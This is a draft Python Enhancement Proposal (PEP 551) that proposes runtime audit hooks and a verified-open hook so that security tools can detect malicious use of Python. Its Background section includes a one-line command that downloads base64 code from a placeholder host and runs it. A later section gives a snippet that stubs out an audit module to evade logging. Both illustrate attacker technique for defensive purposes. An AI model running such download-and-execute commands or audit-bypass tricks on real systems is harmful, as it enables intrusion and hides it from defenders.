788 lines
37 KiB
ReStructuredText
788 lines
37 KiB
ReStructuredText
PEP: 551
|
||
Title: Security transparency in the Python runtime
|
||
Version: $Revision$
|
||
Last-Modified: $Date$
|
||
Author: Steve Dower <steve.dower@python.org>
|
||
Status: Draft
|
||
Type: Standards Track
|
||
Content-Type: text/x-rst
|
||
Created: 23-Aug-2017
|
||
Python-Version: 3.7
|
||
Post-History: 24-Aug-2017 (security-sig), 28-Aug-2017 (python-dev)
|
||
|
||
Abstract
|
||
========
|
||
|
||
This PEP describes additions to the Python API and specific behaviors
|
||
for the CPython implementation that make actions taken by the Python
|
||
runtime visible to security and auditing tools. The goals in order of
|
||
increasing importance are to prevent malicious use of Python, to detect
|
||
and report on malicious use, and most importantly to detect attempts to
|
||
bypass detection. Most of the responsibility for implementation is
|
||
required from users, who must customize and build Python for their own
|
||
environment.
|
||
|
||
We propose two small sets of public APIs to enable users to reliably
|
||
build their copy of Python without having to modify the core runtime,
|
||
protecting future maintainability. We also discuss recommendations for
|
||
users to help them develop and configure their copy of Python.
|
||
|
||
Background
|
||
==========
|
||
|
||
Software vulnerabilities are generally seen as bugs that enable remote
|
||
or elevated code execution. However, in our modern connected world, the
|
||
more dangerous vulnerabilities are those that enable advanced persistent
|
||
threats (APTs). APTs are achieved when an attacker is able to penetrate
|
||
a network, establish their software on one or more machines, and over
|
||
time extract data or intelligence. Some APTs may make themselves known
|
||
by maliciously damaging data (e.g., `WannaCrypt
|
||
<https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/WannaCrypt>`_)
|
||
or hardware (e.g., `Stuxnet
|
||
<https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?name=Win32/Stuxnet>`_).
|
||
Most attempt to hide their existence and avoid detection. APTs often use
|
||
a combination of traditional vulnerabilities, social engineering,
|
||
phishing (or spear-phishing), thorough network analysis, and an
|
||
understanding of misconfigured environments to establish themselves and
|
||
do their work.
|
||
|
||
The first infected machines may not be the final target and may not
|
||
require special privileges. For example, an APT that is established as a
|
||
non-administrative user on a developer’s machine may have the ability to
|
||
spread to production machines through normal deployment channels. It is
|
||
common for APTs to persist on as many machines as possible, with sheer
|
||
weight of presence making them difficult to remove completely.
|
||
|
||
Whether an attacker is seeking to cause direct harm or hide their
|
||
tracks, the biggest barrier to detection is a lack of insight. System
|
||
administrators with large networks rely on distributed logs to
|
||
understand what their machines are doing, but logs are often filtered to
|
||
show only error conditions. APTs that are attempting to avoid detection
|
||
will rarely generate errors or abnormal events. Reviewing normal
|
||
operation logs involves a significant amount of effort, though work is
|
||
underway by a number of companies to enable automatic anomaly detection
|
||
within operational logs. The tools preferred by attackers are ones that
|
||
are already installed on the target machines, since log messages from
|
||
these tools are often expected and ignored in normal use.
|
||
|
||
At this point, we are not going to spend further time discussing the
|
||
existence of APTs or methods and mitigations that do not apply to this
|
||
PEP. For further information about the field, we recommend reading or
|
||
watching the resources listed under `Further Reading`_.
|
||
|
||
Python is a particularly interesting tool for attackers due to its
|
||
prevalence on server and developer machines, its ability to execute
|
||
arbitrary code provided as data (as opposed to native binaries), and its
|
||
complete lack of internal auditing. This allows attackers to download,
|
||
decrypt, and execute malicious code with a single command::
|
||
|
||
python -c "import urllib.request, base64;
|
||
exec(base64.b64decode(
|
||
urllib.request.urlopen('http://my-exploit/py.b64')
|
||
).decode())"
|
||
|
||
This command currently bypasses most anti-malware scanners that rely on
|
||
recognizable code being read through a network connection or being
|
||
written to disk (base64 is often sufficient to bypass these checks). It
|
||
also bypasses protections such as file access control lists or
|
||
permissions (no file access occurs), approved application lists
|
||
(assuming Python has been approved for other uses), and automated
|
||
auditing or logging (assuming Python is allowed to access the internet
|
||
or access another machine on the local network from which to obtain its
|
||
payload).
|
||
|
||
General consensus among the security community is that totally
|
||
preventing attacks is infeasible and defenders should assume that they
|
||
will often detect attacks only after they have succeeded. This is known
|
||
as the "assume breach" mindset. [1]_ In this scenario, protections such
|
||
as sandboxing and input validation have already failed, and the
|
||
important task is detection, tracking, and eventual removal of the
|
||
malicious code. To this end, the primary feature required from Python is
|
||
security transparency: the ability to see what operations the Python
|
||
runtime is performing that may indicate anomalous or malicious use.
|
||
Preventing such use is valuable, but secondary to the need to know that
|
||
it is occurring.
|
||
|
||
To summarise the goals in order of increasing importance:
|
||
|
||
* preventing malicious use is valuable
|
||
* detecting malicious use is important
|
||
* detecting attempts to bypass detection is critical
|
||
|
||
One example of a scripting engine that has addressed these challenges is
|
||
PowerShell, which has recently been enhanced towards similar goals of
|
||
transparency and prevention. [2]_
|
||
|
||
Generally, application and system configuration will determine which
|
||
events within a scripting engine are worth logging. However, given the
|
||
value of many logs events are not recognized until after an attack is
|
||
detected, it is important to capture as much as possible and filter
|
||
views rather than filtering at the source (see the No Easy Breach video
|
||
from `Further Reading`_). Events that are always of interest include
|
||
attempts to bypass auditing, attempts to load and execute code that is
|
||
not correctly signed or access-controlled, use of uncommon operating
|
||
system functionality such as debugging or inter-process inspection
|
||
tools, most network access and DNS resolution, and attempts to create
|
||
and hide files or configuration settings on the local machine.
|
||
|
||
To summarize, defenders have a need to audit specific uses of Python in
|
||
order to detect abnormal or malicious usage. Currently, the Python
|
||
runtime does not provide any ability to do this, which (anecdotally) has
|
||
led to organizations switching to other languages. The aim of this PEP
|
||
is to enable system administrators to deploy a security transparent copy
|
||
of Python that can integrate with their existing auditing and protection
|
||
systems.
|
||
|
||
On Windows, some specific features that may be enabled by this include:
|
||
|
||
* Script Block Logging [3]_
|
||
* DeviceGuard [4]_
|
||
* AMSI [5]_
|
||
* Persistent Zone Identifiers [6]_
|
||
* Event tracing (which includes event forwarding) [7]_
|
||
|
||
On Linux, some specific features that may be integrated are:
|
||
|
||
* gnupg [8]_
|
||
* sd_journal [9]_
|
||
* OpenBSM [10]_
|
||
* syslog [11]_
|
||
* auditd [12]_
|
||
* SELinux labels [13]_
|
||
* check execute bit on imported modules
|
||
|
||
On macOS, some features that may be used with the expanded APIs are:
|
||
|
||
* OpenBSM [10]_
|
||
* syslog [11]_
|
||
|
||
Overall, the ability to enable these platform-specific features on
|
||
production machines is highly appealing to system administrators and
|
||
will make Python a more trustworthy dependency for application
|
||
developers.
|
||
|
||
Overview of Changes
|
||
===================
|
||
|
||
True security transparency is not fully achievable by Python in
|
||
isolation. The runtime can audit as many events as it likes, but unless
|
||
the logs are reviewed and analyzed there is no value. Python may impose
|
||
restrictions in the name of security, but usability may suffer.
|
||
Different platforms and environments will require different
|
||
implementations of certain security features, and organizations with the
|
||
resources to fully customize their runtime should be encouraged to do
|
||
so.
|
||
|
||
The aim of these changes is to enable system administrators to integrate
|
||
Python into their existing security systems, without dictating what
|
||
those systems look like or how they should behave. We propose two API
|
||
changes to enable this: an Audit Hook and Verified Open Hook. Both are
|
||
not set by default, and both require modifications to the entry point
|
||
binary to enable any functionality. For the purposes of validation and
|
||
example, we propose a new ``spython``/``spython.exe`` entry point
|
||
program that enables some basic functionality using these hooks.
|
||
**However, security-conscious organizations are expected to create their
|
||
own entry points to meet their own needs.**
|
||
|
||
Audit Hook
|
||
----------
|
||
|
||
In order to achieve security transparency, an API is required to raise
|
||
messages from within certain operations. These operations are typically
|
||
deep within the Python runtime or standard library, such as dynamic code
|
||
compilation, module imports, DNS resolution, or use of certain modules
|
||
such as ``ctypes``.
|
||
|
||
The new C APIs required for audit hooks are::
|
||
|
||
# Add an auditing hook
|
||
typedef int (*hook_func)(const char *event, PyObject *args);
|
||
int PySys_AddAuditHook(hook_func hook);
|
||
|
||
# Raise an event with all auditing hooks
|
||
int PySys_Audit(const char *event, PyObject *args);
|
||
|
||
# Internal API used during Py_Finalize() - not publicly accessible
|
||
void _Py_ClearAuditHooks(void);
|
||
|
||
The new Python APIs for audit hooks are::
|
||
|
||
# Add an auditing hook
|
||
sys.addaudithook(hook: Callable[str, tuple]) -> None
|
||
|
||
# Raise an event with all auditing hooks
|
||
sys.audit(str, *args) -> None
|
||
|
||
|
||
Hooks are added by calling ``PySys_AddAuditHook()`` from C at any time,
|
||
including before ``Py_Initialize()``, or by calling
|
||
``sys.addaudithook()`` from Python code. Hooks are never removed or
|
||
replaced, and existing hooks have an opportunity to refuse to allow new
|
||
hooks to be added (adding an audit hook is audited, and so preexisting
|
||
hooks can raise an exception to block the new addition).
|
||
|
||
When events of interest are occurring, code can either call
|
||
``PySys_Audit()`` from C (while the GIL is held) or ``sys.audit()``. The
|
||
string argument is the name of the event, and the tuple contains
|
||
arguments. A given event name should have a fixed schema for arguments,
|
||
and both arguments are considered a public API (for a given x.y version
|
||
of Python), and thus should only change between feature releases with
|
||
updated documentation.
|
||
|
||
When an event is audited, each hook is called in the order it was added
|
||
with the event name and tuple. If any hook returns with an exception
|
||
set, later hooks are ignored and *in general* the Python runtime should
|
||
terminate. This is intentional to allow hook implementations to decide
|
||
how to respond to any particular event. The typical responses will be to
|
||
log the event, abort the operation with an exception, or to immediately
|
||
terminate the process with an operating system exit call.
|
||
|
||
When an event is audited but no hooks have been set, the ``audit()``
|
||
function should include minimal overhead. Ideally, each argument is a
|
||
reference to existing data rather than a value calculated just for the
|
||
auditing call.
|
||
|
||
As hooks may be Python objects, they need to be freed during
|
||
``Py_Finalize()``. To do this, we add an internal API
|
||
``_Py_ClearAuditHooks()`` that releases any ``PyObject*`` hooks that are
|
||
held, as well as any heap memory used. This is an internal function with
|
||
no public export, but it triggers an event for all audit hooks to ensure
|
||
that unexpected calls are logged.
|
||
|
||
See `Audit Hook Locations`_ for proposed audit hook points and schemas,
|
||
and the `Recommendations`_ section for discussion on
|
||
appropriate responses.
|
||
|
||
Verified Open Hook
|
||
------------------
|
||
|
||
Most operating systems have a mechanism to distinguish between files
|
||
that can be executed and those that can not. For example, this may be an
|
||
execute bit in the permissions field, or a verified hash of the file
|
||
contents to detect potential code tampering. These are an important
|
||
security mechanism for preventing execution of data or code that is not
|
||
approved for a given environment. Currently, Python has no way to
|
||
integrate with these when launching scripts or importing modules.
|
||
|
||
The new public C API for the verified open hook is::
|
||
|
||
# Set the handler
|
||
typedef PyObject *(*handler_func)(const char *narrow,
|
||
const wchar_t *wide)
|
||
int Py_SetOpenForExecuteHandler(handler_func handler)
|
||
|
||
The new public Python API for the verified open hook is::
|
||
|
||
# Open a file using the handler
|
||
os.open_for_exec(pathlike)
|
||
|
||
The ``os.open_for_exec()`` function is a drop-in replacement for
|
||
``open(pathlike, 'rb')``. Its default behaviour is to open a file for
|
||
raw, binary access - any more restrictive behaviour requires the use of
|
||
a custom handler. (Aside: since ``importlib`` requires access to this
|
||
function before the ``os`` module has been imported, it will be
|
||
available on the ``nt``/``posix`` modules, but the intent is that other
|
||
users will access it through the ``os`` module.)
|
||
|
||
A custom handler may be set by calling ``Py_SetOpenForExecuteHandler()``
|
||
from C at any time, including before ``Py_Initialize()``. However, if a
|
||
handler has already been set then the call will fail. When
|
||
``open_for_exec()`` is called with a handler set, the handler will be
|
||
passed the processed narrow or wide path, depending on platform, and its
|
||
return value will be returned directly. The returned object should be an
|
||
open file-like object that supports reading raw bytes. This is
|
||
explicitly intended to allow a ``BytesIO`` instance if the open handler
|
||
has already had to read the file into memory in order to perform
|
||
whatever verification is necessary to determine whether the content is
|
||
permitted to be executed.
|
||
|
||
Note that these handlers can import and call the ``_io.open()`` function
|
||
on CPython without triggering themselves.
|
||
|
||
If the handler determines that the file is not suitable for execution,
|
||
it should raise an exception of its choice, as well as raising any other
|
||
auditing events or notifications.
|
||
|
||
All import and execution functionality involving code from a file will
|
||
be changed to use ``open_for_exec()`` unconditionally. It is important
|
||
to note that calls to ``compile()``, ``exec()`` and ``eval()`` do not go
|
||
through this function - an audit hook that includes the code from these
|
||
calls will be added and is the best opportunity to validate code that is
|
||
read from the file. Given the current decoupling between import and
|
||
execution in Python, most imported code will go through both
|
||
``open_for_exec()`` and the log hook for ``compile``, and so care should
|
||
be taken to avoid repeating verification steps.
|
||
|
||
.. note::
|
||
The use of ``open_for_exec()`` by ``importlib`` is a valuable first
|
||
defence, but should not be relied upon to prevent misuse. In
|
||
particular, it is easy to monkeypatch ``importlib`` in order to
|
||
bypass the call. Auditing hooks are the primary way to achieve
|
||
security transparency, and are essential for detecting attempts to
|
||
bypass other functionality.
|
||
|
||
API Availability
|
||
----------------
|
||
|
||
While all the functions added here are considered public and stable API,
|
||
the behavior of the functions is implementation specific. The
|
||
descriptions here refer to the CPython implementation, and while other
|
||
implementations should provide the functions, there is no requirement
|
||
that they behave the same.
|
||
|
||
For example, ``sys.addaudithook()`` and ``sys.audit()`` should exist but
|
||
may do nothing. This allows code to make calls to ``sys.audit()``
|
||
without having to test for existence, but it should not assume that its
|
||
call will have any effect. (Including existence tests in
|
||
security-critical code allows another vector to bypass auditing, so it
|
||
is preferable that the function always exist.)
|
||
|
||
``os.open_for_exec(pathlike)`` should at a minimum always return
|
||
``_io.open(pathlike, 'rb')``. Code using the function should make no
|
||
further assumptions about what may occur, and implementations other than
|
||
CPython are not required to let developers override the behavior of this
|
||
function with a hook.
|
||
|
||
Audit Hook Locations
|
||
====================
|
||
|
||
Calls to ``sys.audit()`` or ``PySys_Audit()`` will be added to the
|
||
following operations with the schema in Table 1. Unless otherwise
|
||
specified, the ability for audit hooks to abort any listed operation
|
||
should be considered part of the rationale for including the hook.
|
||
|
||
.. csv-table:: Table 1: Audit Hooks
|
||
:header: "API Function", "Event Name", "Arguments", "Rationale"
|
||
:widths: 2, 2, 3, 6
|
||
|
||
``PySys_AddAuditHook``, ``sys.addaudithook``, "", "Detect when new
|
||
audit hooks are being added."
|
||
``_PySys_ClearAuditHooks``, ``sys._clearaudithooks``, "", "Notifies
|
||
hooks they are being cleaned up, mainly in case the event is
|
||
triggered unexpectedly. This event cannot be aborted."
|
||
``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "", "
|
||
Detects any attempt to set the ``open_for_execute`` handler."
|
||
"``compile``, ``exec``, ``eval``, ``PyAst_CompileString``,
|
||
``PyAST_obj2mod``", ``compile``, "``(code, filename_or_none)``", "
|
||
Detect dynamic code compilation, where ``code`` could be a string or
|
||
AST. Note that this will be called for regular imports of source
|
||
code, including those that were opened with ``open_for_exec``."
|
||
"``exec``, ``eval``, ``run_mod``", ``exec``, "``(code_object,)``", "
|
||
Detect dynamic execution of code objects. This only occurs for
|
||
explicit calls, and is not raised for normal function invocation."
|
||
``import``, ``import``, "``(module, filename, sys.path,
|
||
sys.meta_path, sys.path_hooks)``", "Detect when modules are
|
||
imported. This is raised before the module name is resolved to a
|
||
file. All arguments other than the module name may be ``None`` if
|
||
they are not used or available."
|
||
``code_new``, ``code.__new__``, "``(bytecode, filename, name)``", "
|
||
Detect dynamic creation of code objects. This only occurs for
|
||
direct instantiation, and is not raised for normal compilation."
|
||
"``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "
|
||
``(module_or_path,)``", "Detect when native modules are used."
|
||
``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``", "
|
||
Collect information about specific symbols retrieved from native
|
||
modules."
|
||
``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect
|
||
when code is accessing arbitrary memory using ``ctypes``"
|
||
``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing
|
||
the id of objects, which in CPython reveals information about
|
||
memory layout."
|
||
``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect
|
||
when code is accessing frames directly"
|
||
``sys._current_frames``, ``sys._current_frames``, "", "Detect when
|
||
code is accessing frames directly"
|
||
``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is
|
||
injecting trace functions. Because of the implementation, exceptions
|
||
raised from the hook will abort the operation, but will not be
|
||
raised in Python code. Note that ``threading.setprofile`` eventually
|
||
calls this function, so the event will be audited for each thread."
|
||
``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is
|
||
injecting trace functions. Because of the implementation, exceptions
|
||
raised from the hook will abort the operation, but will not be
|
||
raised in Python code. Note that ``threading.settrace`` eventually
|
||
calls this function, so the event will be audited for each thread."
|
||
``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "
|
||
", "Detect changes to async generator hooks."
|
||
``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "
|
||
", "Detect changes to async generator hooks."
|
||
``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "
|
||
", "Detect changes to the coroutine wrapper."
|
||
``Py_SetRecursionLimit``, ``sys.setrecursionlimit``, "
|
||
``(new_limit,)``", "Detect changes to the recursion limit."
|
||
``_PyEval_SetSwitchInterval``, ``sys.setswitchinterval``, "
|
||
``(interval_us,)``", "Detect changes to the switching interval."
|
||
"``socket.bind``, ``socket.connect``, ``socket.connect_ex``,
|
||
``socket.getaddrinfo``, ``socket.getnameinfo``, ``socket.sendmsg``,
|
||
``socket.sendto``", ``socket.address``, "``(address,)``", "Detect
|
||
access to network resources. The address is unmodified from the
|
||
original call."
|
||
``socket.__init__``, "socket()", "``(family, type, proto)``", "
|
||
Detect creation of sockets. The arguments will be int values."
|
||
``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts
|
||
to retrieve the current host name."
|
||
``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "
|
||
Detect attempts to change the current host name. The name argument
|
||
is passed as a bytes object."
|
||
"``socket.gethostbyname``, ``socket.gethostbyname_ex``",
|
||
"``socket.gethostbyname``", "``(name,)``", "Detect host name
|
||
resolution. The name argument is a str or bytes object."
|
||
``socket.gethostbyaddr``, ``socket.gethostbyaddr``, "
|
||
``(address,)``", "Detect host resolution. The address argument is a
|
||
str or bytes object."
|
||
``socket.getservbyname``, ``socket.getservbyname``, "``(name,
|
||
protocol)``", "Detect service resolution. The arguments are str
|
||
objects."
|
||
``socket.getservbyport``, ``socket.getservbyport``, "``(port,
|
||
protocol)``", "Detect service resolution. The port argument is an
|
||
int and protocol is a str."
|
||
"``_PyObject_GenericSetAttr``, ``check_set_special_type_attr``,
|
||
``object_set_class``",``object.__setattr__``,"``(object, attr,
|
||
value)``","Detect monkey patching of types and objects. This event
|
||
is raised for the ``__class__`` attribute and any attribute on
|
||
``type`` objects."
|
||
``_PyObject_GenericSetAttr``,``object.__delattr__``,"``(object,
|
||
attr)``","Detect deletion of object attributes. This event is raised
|
||
for any attribute on ``type`` objects."
|
||
``Unpickler.find_class``,``pickle.find_class``,"``(module_name,
|
||
global_name)``","Detect imports and global name lookup when
|
||
unpickling."
|
||
|
||
TODO - more hooks in ``_socket``, ``_ssl``, others?
|
||
* code objects
|
||
* function objects
|
||
|
||
SPython Entry Point
|
||
===================
|
||
|
||
A new entry point binary will be added, called ``spython.exe`` on
|
||
Windows and ``spythonX.Y`` on other platforms. This entry point is
|
||
intended primarily as an example, as we expect most users of this
|
||
functionality to implement their own entry point and hooks (see
|
||
`Recommendations`_). It will also be used for tests.
|
||
|
||
Source builds will build ``spython`` by default, but distributions
|
||
should not include it except as a test binary. The python.org managed
|
||
binary distributions will not include ``spython``.
|
||
|
||
**Do not accept most command-line arguments**
|
||
|
||
The ``spython`` entry point requires a script file be passed as the
|
||
first argument, and does not allow any options. This prevents arbitrary
|
||
code execution from in-memory data or non-script files (such as pickles,
|
||
which can be executed using ``-m pickle <path>``.
|
||
|
||
Options ``-B`` (do not write bytecode), ``-E`` (ignore environment
|
||
variables) and ``-s`` (no user site) are assumed.
|
||
|
||
If a file with the same full path as the process with a ``._pth`` suffix
|
||
(``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it
|
||
will be used to initialize ``sys.path`` following the rules currently
|
||
described `for Windows
|
||
<https://docs.python.org/3/using/windows.html#finding-modules>`_.
|
||
|
||
When built with ``Py_DEBUG``, the ``spython`` entry point will allow a
|
||
``-i`` option with no other arguments to enter into interactive mode,
|
||
with audit messages being written to standard error rather than a file.
|
||
This is intended for testing and debugging only.
|
||
|
||
**Log security events to a file**
|
||
|
||
Before initialization, ``spython`` will set an audit hook that writes
|
||
events to a local file. By default, this file is the full path of the
|
||
process with a ``.log`` suffix, but may be overridden with the
|
||
``SPYTHONLOG`` environment variable (despite such overrides being
|
||
explicitly discouraged in `Recommendations`_).
|
||
|
||
The audit hook will also abort all ``sys.addaudithook`` events,
|
||
preventing any other hooks from being added.
|
||
|
||
**Restrict importable modules**
|
||
|
||
Also before initialization, ``spython`` will set an open-for-execute
|
||
hook that validates all files opened with ``os.open_for_exec``. This
|
||
implementation will require all files to have a ``.py`` suffix (thereby
|
||
blocking the use of cached bytecode), and will raise a custom audit
|
||
event ``spython.open_for_exec`` containing ``(filename,
|
||
True_if_allowed)``.
|
||
|
||
On Windows, the hook will also open the file with flags that prevent any
|
||
other process from opening it with write access, which allows the hook
|
||
to perform additional validation on the contents with confidence that it
|
||
will not be modified between the check and use. Compilation will later
|
||
trigger a ``compile`` event, so there is no need to read the contents
|
||
now for AMSI, but other validation mechanisms such as DeviceGuard [4]_
|
||
should be performed here.
|
||
|
||
**Restrict globals in pickles**
|
||
|
||
The ``spython`` entry point will abort all ``pickle.find_class`` events
|
||
that use the default implementation. Overrides will not raise audit
|
||
events unless explicitly added, and so they will continue to be allowed.
|
||
|
||
Performance Impact
|
||
==================
|
||
|
||
**TODO**
|
||
|
||
Full impact analysis still requires investigation. Preliminary testing
|
||
shows that calling ``sys.audit`` with no hooks added does not
|
||
significantly affect any existing benchmarks, though targeted
|
||
microbenchmarks can observe an impact.
|
||
|
||
Performance impact using ``spython`` or with hooks added are not of
|
||
interest here, since this is considered opt-in functionality.
|
||
|
||
|
||
Recommendations
|
||
===============
|
||
|
||
Specific recommendations are difficult to make, as the ideal
|
||
configuration for any environment will depend on the user's ability to
|
||
manage, monitor, and respond to activity on their own network. However,
|
||
many of the proposals here do not appear to be of value without deeper
|
||
illustration. This section provides recommendations using the terms
|
||
**should** (or **should not**), indicating that we consider it dangerous
|
||
to ignore the advice, and **may**, indicating that for the advice ought
|
||
to be considered for high value systems. The term **sysadmins** refers
|
||
to whoever is responsible for deploying Python throughout your network;
|
||
different organizations may have an alternative title for the
|
||
responsible people.
|
||
|
||
Sysadmins **should** build their own entry point, likely starting from
|
||
the ``spython`` source, and directly interface with the security systems
|
||
available in their environment. The more tightly integrated, the less
|
||
likely a vulnerability will be found allowing an attacker to bypass
|
||
those systems. In particular, the entry point **should not** obtain any
|
||
settings from the current environment, such as environment variables,
|
||
unless those settings are otherwise protected from modification.
|
||
|
||
Audit messages **should not** be written to a local file. The
|
||
``spython`` entry point does this for example and testing purposes. On
|
||
production machines, tools such as ETW [7]_ or auditd [12]_ that are
|
||
intended for this purpose should be used.
|
||
|
||
The default ``python`` entry point **should not** be deployed to
|
||
production machines, but could be given to developers to use and test
|
||
Python on non-production machines. Sysadmins **may** consider deploying
|
||
a less restrictive version of their entry point to developer machines,
|
||
since any system connected to your network is a potential target.
|
||
Sysadmins **may** deploy their own entry point as ``python`` to obscure
|
||
the fact that extra auditing is being included.
|
||
|
||
Python deployments **should** be made read-only using any available
|
||
platform functionality after deployment and during use.
|
||
|
||
On platforms that support it, sysadmins **should** include signatures
|
||
for every file in a Python deployment, ideally verified using a private
|
||
certificate. For example, Windows supports embedding signatures in
|
||
executable files and using catalogs for others, and can use DeviceGuard
|
||
[4]_ to validate signatures either automatically or using an
|
||
``open_for_exec`` hook.
|
||
|
||
Sysadmins **should** log as many audited events as possible, and
|
||
**should** copy logs off of local machines frequently. Even if logs are
|
||
not being constantly monitored for suspicious activity, once an attack
|
||
is detected it is too late to enable auditing. Audit hooks **should
|
||
not** attempt to preemptively filter events, as even benign events are
|
||
useful when analyzing the progress of an attack. (Watch the "No Easy
|
||
Breach" video under `Further Reading`_ for a deeper look at this side of
|
||
things.)
|
||
|
||
Most actions **should not** be aborted if they could ever occur during
|
||
normal use or if preventing them will encourage attackers to work around
|
||
them. As described earlier, awareness is a higher priority than
|
||
prevention. Sysadmins **may** audit their Python code and abort
|
||
operations that are known to never be used deliberately.
|
||
|
||
Audit hooks **should** write events to logs before attempting to abort.
|
||
As discussed earlier, it is more important to record malicious actions
|
||
than to prevent them.
|
||
|
||
Sysadmins **should** identify correlations between events, as a change
|
||
to correlated events may indicate misuse. For example, module imports
|
||
will typically trigger the ``import`` auditing event, followed by an
|
||
``open_for_exec`` call and usually a ``compile`` event. Attempts to
|
||
bypass auditing will often suppress some but not all of these events. So
|
||
if the log contains ``import`` events but not ``compile`` events,
|
||
investigation may be necessary.
|
||
|
||
The first audit hook **should** be set in C code before
|
||
``Py_Initialize`` is called, and that hook **should** unconditionally
|
||
abort the ``sys.addloghook`` event. The Python interface is primarily
|
||
intended for testing and development.
|
||
|
||
To prevent audit hooks being added on non-production machines, an entry
|
||
point **may** add an audit hook that aborts the ``sys.addloghook`` event
|
||
but otherwise does nothing.
|
||
|
||
On production machines, a non-validating ``open_for_exec`` hook **may**
|
||
be set in C code before ``Py_Initialize`` is called. This prevents later
|
||
code from overriding the hook, however, logging the
|
||
``setopenforexecutehandler`` event is useful since no code should ever
|
||
need to call it. Using at least the sample ``open_for_exec`` hook
|
||
implementation from ``spython`` is recommended.
|
||
|
||
Since ``importlib``'s use of ``open_for_exec`` may be easily bypassed
|
||
with monkeypatching, an audit hook **should** be used to detect
|
||
attribute changes on type objects.
|
||
|
||
[TODO: more good advice; less bad advice]
|
||
|
||
Rejected Ideas
|
||
==============
|
||
|
||
Separate module for audit hooks
|
||
-------------------------------
|
||
|
||
The proposal is to add a new module for audit hooks, hypothetically
|
||
``audit``. This would separate the API and implementation from the
|
||
``sys`` module, and allow naming the C functions ``PyAudit_AddHook`` and
|
||
``PyAudit_Audit`` rather than the current variations.
|
||
|
||
Any such module would need to be a built-in module that is guaranteed to
|
||
always be present. The nature of these hooks is that they must be
|
||
callable without condition, as any conditional imports or calls provide
|
||
more opportunities to intercept and suppress or modify events.
|
||
|
||
Given its nature as one of the most core modules, the ``sys`` module is
|
||
somewhat protected against module shadowing attacks. Replacing ``sys``
|
||
with a sufficiently functional module that the application can still run
|
||
is a much more complicated task than replacing a module with only one
|
||
function of interest. An attacker that has the ability to shadow the
|
||
``sys`` module is already capable of running arbitrary code from files,
|
||
whereas an ``audit`` module can be replaced with a single statement::
|
||
|
||
import sys; sys.modules['audit'] = type('audit', (object,),
|
||
{'audit': lambda *a: None, 'addhook': lambda *a: None})
|
||
|
||
Multiple layers of protection already exist for monkey patching attacks
|
||
against either ``sys`` or ``audit``, but assignments or insertions to
|
||
``sys.modules`` are not audited.
|
||
|
||
This idea is rejected because it makes substituting ``audit`` calls
|
||
throughout all callers near trivial.
|
||
|
||
Flag in sys.flags to indicate "secure" mode
|
||
-------------------------------------------
|
||
|
||
The proposal is to add a value in ``sys.flags`` to indicate when Python
|
||
is running in a "secure" mode. This would allow applications to detect
|
||
when some features are enabled and modify their behaviour appropriately.
|
||
|
||
Currently there are no guarantees made about security by this PEP - this
|
||
section is the first time the word "secure" has been used. Security
|
||
**transparency** does not result in any changed behaviour, so there is
|
||
no appropriate reason for applications to modify their behaviour.
|
||
|
||
Both application-level APIs ``sys.audit`` and ``os.open_for_exec`` are
|
||
always present and functional, regardless of whether the regular
|
||
``python`` entry point or some alternative entry point is used. Callers
|
||
cannot determine whether any hooks have been added (except by performing
|
||
side-channel analysis), nor do they need to. The calls should be fast
|
||
enough that callers do not need to avoid them, and the sysadmin is
|
||
responsible for ensuring their added hooks are fast enough to not affect
|
||
application performance.
|
||
|
||
The argument that this is "security by obscurity" is valid, but
|
||
irrelevant. Security by obscurity is only an issue when there are no
|
||
other protective mechanisms; obscurity as the first step in avoiding
|
||
attack is strongly recommended (see `this article
|
||
<https://danielmiessler.com/study/security-by-obscurity/>`_ for
|
||
discussion).
|
||
|
||
This idea is rejected because there are no appropriate reasons for an
|
||
application to change its behaviour based on whether these APIs are in
|
||
use.
|
||
|
||
Further Reading
|
||
===============
|
||
|
||
|
||
**Redefining Malware: When Old Terms Pose New Threats**
|
||
By Aviv Raff for SecurityWeek, 29th January 2014
|
||
|
||
This article, and those linked by it, are high-level summaries of the rise of
|
||
APTs and the differences from "traditional" malware.
|
||
|
||
`<http://www.securityweek.com/redefining-malware-when-old-terms-pose-new-threats>`_
|
||
|
||
**Anatomy of a Cyber Attack**
|
||
By FireEye, accessed 23rd August 2017
|
||
|
||
A summary of the techniques used by APTs, and links to a number of relevant
|
||
whitepapers.
|
||
|
||
`<https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html>`_
|
||
|
||
**Automated Traffic Log Analysis: A Must Have for Advanced Threat Protection**
|
||
By Aviv Raff for SecurityWeek, 8th May 2014
|
||
|
||
High-level summary of the value of detailed logging and automatic analysis.
|
||
|
||
`<http://www.securityweek.com/automated-traffic-log-analysis-must-have-advanced-threat-protection>`_
|
||
|
||
**No Easy Breach: Challenges and Lessons Learned from an Epic Investigation**
|
||
Video presented by Matt Dunwoody and Nick Carr for Mandiant at SchmooCon 2016
|
||
|
||
Detailed walkthrough of the processes and tools used in detecting and removing
|
||
an APT.
|
||
|
||
`<https://archive.org/details/No_Easy_Breach>`_
|
||
|
||
**Disrupting Nation State Hackers**
|
||
Video presented by Rob Joyce for the NSA at USENIX Enigma 2016
|
||
|
||
Good security practices, capabilities and recommendations from the chief of
|
||
NSA's Tailored Access Operation.
|
||
|
||
`<https://www.youtube.com/watch?v=bDJb8WOJYdA>`_
|
||
|
||
References
|
||
==========
|
||
|
||
.. [1] Assume Breach Mindset, `<http://asian-power.com/node/11144>`_
|
||
|
||
.. [2] PowerShell Loves the Blue Team, also known as Scripting Security and
|
||
Protection Advances in Windows 10, `<https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/>`_
|
||
|
||
